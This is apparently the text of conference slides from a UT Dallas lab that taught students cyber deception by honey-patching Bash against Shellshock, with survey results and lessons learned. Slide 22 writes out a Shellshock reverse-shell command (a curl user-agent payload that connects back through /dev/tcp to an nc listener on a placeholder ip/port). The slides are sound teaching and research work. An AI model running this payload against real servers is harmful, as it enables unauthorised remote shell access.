Experiences with Honey-Patching in Active Cyber Security Education



Similar documents
How To Teach Cyber Deception To Students At The University Of Texas At Dallas

Penetration Testing Workshop

SETTING UP AND USING A CYBER SECURITY LAB FOR EDUCATION PURPOSES *

Penetration Testing - a way for improving our cyber security

CyberNEXS Global Services

INDUSTRIAL CONTROL SYSTEMS CYBER SECURITY DEMONSTRATION

Penetration Testing Report Client: Business Solutions June 15 th 2015

Background ( )

NETWORK SECURITY (W/LAB) Course Syllabus

Virtual Learning Tools in Cyber Security Education

Certification Programs

Erik Johansson, , Virtualization in Control Systems Possibilities and Challenges

Contestant Requirements:

Certification Programs

Understanding the Security Vendor Landscape Using the Cyber Defense Matrix

TEACHING COMPUTER SECURITY TO UNDERGRADUATES A Hands-On Approach

Security Intelligence Services. Cybersecurity training.

Shellshock. Oz Elisyan & Maxim Zavodchik

Cyber Exercises, Small and Large

CAPTURE-THE-FLAG: LEARNING COMPUTER SECURITY UNDER FIRE

Tool-based Approaches to Software Security. Prof. Dr. Eric Bodden Andreas Follner

Integrating Web Application Security into the IT Curriculum

CYBER SECURITY TRAINING SAFE AND SECURE

N-Dimension Solutions Cyber Security for Utilities

SCADA Security Training

This session was presented by Jim Stickley of TraceSecurity on Wednesday, October 23 rd at the Cyber Security Summit.

ISERink Overview. Version 1.1. February 1, 2015

EC-Council Certified Security Analyst (ECSA)

Computer Security Curriculum at the Univ. of Wisconsin Eau Claire. Paul J. Wagner

Leveraging SANS and NIST to Evaluate New Security Tools

Bank Hacking Live! Ofer Maor CTO, Hacktics Ltd. ATC-4, 12 Jun 2006, 4:30PM

CS 558 Internet Systems and Technologies

Malware Analysis Quiz 6

Deep Security Vulnerability Protection Summary

The Risks that Pen Tests don t Find. OWASP 13 April The OWASP Foundation

Building the Next Generation of Computer Security Professionals. Chris Simpson

Enterprise Security Platform for Government

Course Content Summary ITN 261 Network Attacks, Computer Crime and Hacking (4 Credits)

SECURITY ACROSS THE CURRICULUM: USING COMPUTER SECURITY TO TEACH COMPUTER SCIENCE PRINCIPLES

The Open Cyber Challenge Platform *

Cyber Learning Solutions

CIS 4204 Ethical Hacking Fall, 2014

Information Security Attack Tree Modeling for Enhancing Student Learning

Analyze. Secure. Defend. Do you hold ECSA credential?

RSA Enterprise Compromise Assessment Tool (ECAT) Date: January 2014 Authors: Jon Oltsik, Senior Principal Analyst and Tony Palmer, Senior Lab Analyst

Advancing Cyber Security Using System Dynamics Simulation Modeling for System Resilience, Patching, and Software Development

CORE IMPACT AND THE CONSENSUS AUDIT GUIDELINES (CAG)

EC-Council. Certified Ethical Hacker. Program Brochure

Active Learning with the CyberCIEGE Video Game

Penetration Test Report

How To Mitigate A Ddos Attack

Small-Scale Cyber Security Competitions

Cyber Defense Exercise: A Service Provider Model

Hackers are here. Where are you?

Symantec Cyber Security Services: A Recipe for Disaster

CAPTURE-THE-FLAG: LEARNING COMPUTER SECURITY UNDER FIRE

ITS425: Ethical Hacking and Penetration Testing

Remote PC Guide Series - Volume 1

Technical Testing. Network Testing DATA SHEET

Guideline on Firewall

Course Title: Penetration Testing: Network & Perimeter Testing

Metasploit The Elixir of Network Security

Concierge SIEM Reporting Overview

Monitor and Secure Linux System with Open Source Tripwire

PRINCIPLES AND PRACTICE OF INFORMATION SECURITY

NSA/DHS Centers of Academic Excellence for Information Assurance/Cyber Defense

How To Secure Cloud Computing

How to Configure an Initial Installation of the VMware ESXi Hypervisor

Managed Intrusion, Detection, & Prevention Services (MIDPS) Why Sorting Solutions? Why ProtectPoint?

CYBERTRON NETWORK SOLUTIONS

SECURITY REIMAGINED SPEAR PHISHING ATTACKS WHY THEY ARE SUCCESSFUL AND HOW TO STOP THEM. Why Automated Analysis Tools are not Created Equal

CYBER DEFENSE COMPETITION: A TALE OF TWO TEAMS *

Increase insight. Reduce risk. Feel confident.

Course Title Penetration Testing: Procedures & Methodologies

Securing Industrial Control Systems on a Virtual Platform

AC : WORK-IN-PROGRESS: CREATING AN INTRUSION DE- TECTION EXPERIMENTAL ENVIRONMENT USING CLOUD-BASED VIR- TUALIZATION TECHNOLOGY

Evading Infrastructure Security Mohamed Bedewi Penetration Testing Consultant

The Five Most Common Cyber-Attack Myths Debunked

LEARNING COMPUTER SYSTEMS VULNERABILITIES EXPLOITATION THROUGH PENETRATION TEST EXPERIMENTS

Behind of the Penetration testing. L33

Intrusion Defense Firewall

Jumpstarting Your Security Awareness Program

Network Based Intrusion Detection Using Honey pot Deception

Security A to Z the most important terms

Service Manager and the Heartbleed Vulnerability (CVE )

Computer Security CS 426 Lecture 36. CS426 Fall 2010/Lecture 36 1

Preparing for a Cyber Attack PROTECT YOUR PEOPLE AND INFORMATION WITH SYMANTEC SECURITY SOLUTIONS

Cybersecurity AAS Program

Cybersecurity Vulnerability Management:

VMWARE COURSE OUTLINE. Revision 1.0 Prepared by: See CY

Research and Educational Networking Information Analysis and Sharing Center (REN-ISAC)

CHAPTER 3 : INCIDENT RESPONSE FIVE KEY RECOMMENDATIONS GLOBAL THREAT INTELLIGENCE REPORT 2015 :: COPYRIGHT 2015 NTT INNOVATION INSTITUTE 1 LLC

Security Training-as-a-Service (STr-aaS) Service Details & Features

APT Advanced Persistent Threat Time to rethink?

Defensible Strategy To. Cyber Incident Response

TAKING SECURITY TESTING TO THE NEXT LEVEL 5 MAY 2014 STAN HEGT

White Paper: Consensus Audit Guidelines and Symantec RAS

Hackers are here. Where are you?

Securing Web Applications...at the Network Layer

Transcription:

ERIK JONSSON SCHOOL OF ENGINEERING AND COMPUTER SCIENCE Cybersecurity Research and Education Institute Experiences with Honey-Patching in Active Cyber Security Education Frederico Araujo Mohammad Shapouri Sonakshi Pandey Kevin Hamlen The University of Texas at Dallas 8 th Workshop on Cyber Security Experimentation and Test, Aug 10th, 2015 ONR N00014-14-1-0030, AFOSR FA9550-14-1-0173, NSF 1054629

Cyber Deception Increasingly Important Advanced malware attacks often undertake elaborate user deceptions Stuxnet s replaying of pre-recorded equipment readings over $23K losses per day due to government official impersonation according to FBI Modern cyber defenders must be aware of attacker s strategies and techniques in order to anticipate their actions think like an attacker skills for creating and mitigating deceptive software limit attack surface exposed to cyber criminals U.S. Air Force focus area: Cyber Deception, 2015 2/27

Challenges of Teaching Cyber Deception Cyber deception defense is exceptionally difficult to convey effectively in a traditional classroom structured lectures and assignments rehearsed, time-honored mode of thinking antithetical to real-world encounters involving advanced attackers CTF are a promising approach for teaching practical active defense often omit Cyber Deception 3/27

Cyber Deception Education Lab Lab designed to teach active cyber defense and attacker-deception to CS students strategy for effectively communicating deceptive technical skills leveraging the new paradigm of honey-patching [CCS 14] Honey-patching used to teach cyber deception in ways that overcome the otherwise predictable classroom environment Lab organized with the help of UTD s Computer Security Group student association covered by UTD IRB approval MR15-185 conducted by personnel NIH-certified in protection of human subjects 4/27

Outline 1. Overview 2. Honey-Patching 3. Lab Design 4. Survey Results 5. Discussion & Lessons Learned 6. Conclusions 5/27

Honey-Patching decoy web server clone (honey-patched) (unpatched) (patched) attack probe payload fake credit #*?&#?*# no! card card # # attacker Targets 74.125.205.231 74.125.245.177 74.125.125.214 74.125.235.122 74.125.217.103... web server (unpatched) (patched) 6/27

Honey-Patching patch 1 + if (attack detected) 2 + reject; honey-patch 1 + if (attack detected) 2 + fork to decoy; 7/27

Honey-Patching 2. request server application reverse 1. request proxy honey-patched 3. fork controller 6. response 4. clone target attacker server application unpatched clone decoy container pool 5. response 8/27

Advantages Frustrate attacker vulnerability-probing mask patching lapses increase attacker risk Collect preparatory counterreconnaissance against directed attacks Honeypot lives inside the live server, not as a separate decoy machine Unique opportunities for attacker disinformation and misdirection Keep attackers on the hook longer Leak arbitrary (fake) secrets Fool attackers into disclosing their real payloads 9/27

Outline 1. Overview 2. Honey-Patching 3. Lab Design 4. Survey Results 5. Discussion & Lessons Learned 6. Conclusions 10/27

Lab Overview 1:05 PM - 1:25 PM Preparation 1:25 PM - 2:00 PM Exploitation Survey 2:10 PM - 2:50 PM Active Defense Feedback 1:00 PM 3:00 PM 11/27

Infrastructure & Preparation Target Server honey-patched Bash against Shellshock, setup with Apache HTTP + mod_cgi decoys instrumented with file-system and network monitors Attacker Environment VMs deployed as linked clones of a base image containing all lab material guests accessible from lab workstations or BYOD wireless network attacker 1 server lab subnet campus network attacker n VMware ESXi 12/27

Honey-Patched Target Abbreviate patch for CVE-2014-6271 Honey-patch for CVE-2014-6271 13/27

Decoy Monitoring Decoy s file-system monitoring Decoy s deep inspection of network packets 14/27

Outline 1. Overview 2. Honey-Patching 3. Lab Design 4. Survey Results 5. Discussion & Lessons Learned 6. Conclusions 15/27

First Survey (2:00 2:10 pm) Q1. Did you succeed in attacking the server? (yes/no) If yes, what actions did you take after you were able to exploit the vulnerability? Yes: 7/7, No: 0/7 Q2. Did the vulnerable server raise any red flags? (yes/no) Yes: 0/7, No: 7/7 Q3. If Yes to Q2: Did you think you were interacting with a real server (i.e., not a trap)? (yes/no) If not, please explain. Q4. If Yes to Q2: Did you observe anything anomalous in any of the following: filesystem, server responses? (yes/no) If yes, how long until you observed them? 16/27

Second Survey (2:50 3:00 pm) Q1. After your were told that the system was honey-patched, what actions did you take? Did you try to hack the system? (yes/no) Yes: 1/7, No: 6/7 Q2. If you were given enough time, what would you attempt to do? Q3. Did you find this exercise useful for expanding your cyber security education? (yes/no) Yes: 7/7, No: 0/7 Q4. Were the tutorial instructions clear? (yes/no) If not, please suggest improvements. Yes: 7/7, No: 0/7 Q5. Were the student instructors helpful and responsive? (yes/no) Yes: 7/7, No: 0/7 Q6. Did this exercise increase your interest in the research side of cyber security? (yes/no) Please elaborate. Yes: 7/7, No: 0/7 17/27

Deceptiveness of Honey-Patching Did the vulnerable server raise any red flags? (yes/no) Yes: 0/7, No: 7/7 deception was successful for the entire duration of the first exercise If you were given enough time, what would you attempt to do? look into the services running in the decoy note files of interest and their properties (e.g., author, permission) look for red flags that could be used to fingerprint a honey-patched system attempt to find vulnerabilities in the honey-patch components e.g., front-end proxy look for security flaws and exploit them 18/27

Learning Experience Did you find this exercise useful for expanding your cyber security education? (yes/no) Yes: 7/7, No: 0/7 students found it exciting to see how the exploit worked first-hand learning attack and active defense concepts seems to entice students curiosity and develop their interest in applied cyber security lab encouraged students to seek deception-exposing strategies and examine exploit outcomes critically rather than accepting them at face value Did this exercise increase your interest in the research side of cyber security? (yes/no) Please elaborate. Yes: 7/7, No: 0/7 received constructive feedback from students, including proposals for new challenges, different methods of attack, and alternative defense methods enjoyed seeing the research being done to take advantage [of attacks] use honey-patching as a strategy to enhance incidence response 19/27

Outline 1. Overview 2. Honey-Patching 3. Lab Design 4. Survey Results 5. Discussion & Lessons Learned 6. Conclusions 20/27

Participants The lab was open to any student willing to participate no background requirements Advertisement through security and computer student organizations homepages and mailing lists lab promoted as a hands-on challenge on Shellshock exploitation and defense Participants all CS majors, with limited experience in cyber security only a few students had performed penetration tests before lab was staffed by one PhD student and two Masters students who acted as tutors for the lab 21/27

Interactive Demonstration Delivered at the end of the preparation session no-one-left-behind exercise provided clarifications on concepts introduced in the initial lab presentation basic working knowledge of Shellshock exploitation Worked well for our small group but it would probably need to be adjusted for larger number of students attacker nc -l port curl -A "() {:;};/bin/bash -i >& /dev/tcp/ip/port 0>&1"... reverse s hell server login.cgi 22/27

Lab Organization Short, alternating structured (lecturing, demo) and unstructured (free hands-on) sessions keep students focused and motivated freedom of experimentation good balance between guided and exploratory learning Concealment of honey-patching deception during first hands-on session raised students interest relative to disclosing it upfront well-received by students: the deception was benign and educational evoked an element of surprise that instill curiosity in students Increase in interest after introducing the research on honey-patching evidenced by the surge in questions and discussions 23/27

Cyber Deception CTF Offensive-defensive team challenge participants will learn and practice deception and anti-deception techniques initial target: TexSAW two different CTF styles 1 2 - students trained on honey-patching - capture the flag while avoiding submitting captured decoy flags - flag validation happens at the end of predetermined phases - enter teams trained in cyber-deceptive active defense into preexisting CTFs, without other teams knowing - if successful, this can provide empirical evidence of the efficacy of honey-patching and other deceptive defenses 24/27

Outline 1. Overview 2. Honey-Patching 3. Lab Design 4. Survey Results 5. Discussion & Lessons Learned 6. Conclusions 25/27

Conclusions Cyber security programs should complement the classroom experience with hands-on exercises invite students to try new research learn state-of-the-art cyber defense tools and techniques Cyber deception is an increasingly important component of cyber defenses level the battlefield that otherwise favors attackers arms race, which depends upon effective skills Honey-patching as educational tool links deception to penetration testing introduces deception in a benign and interesting way help overcome the otherwise predictable (non-deceptive) classroom environment 26/27

The End Thank you! Questions? Frederico Araujo (frederico.araujo@utdallas.edu) 27/27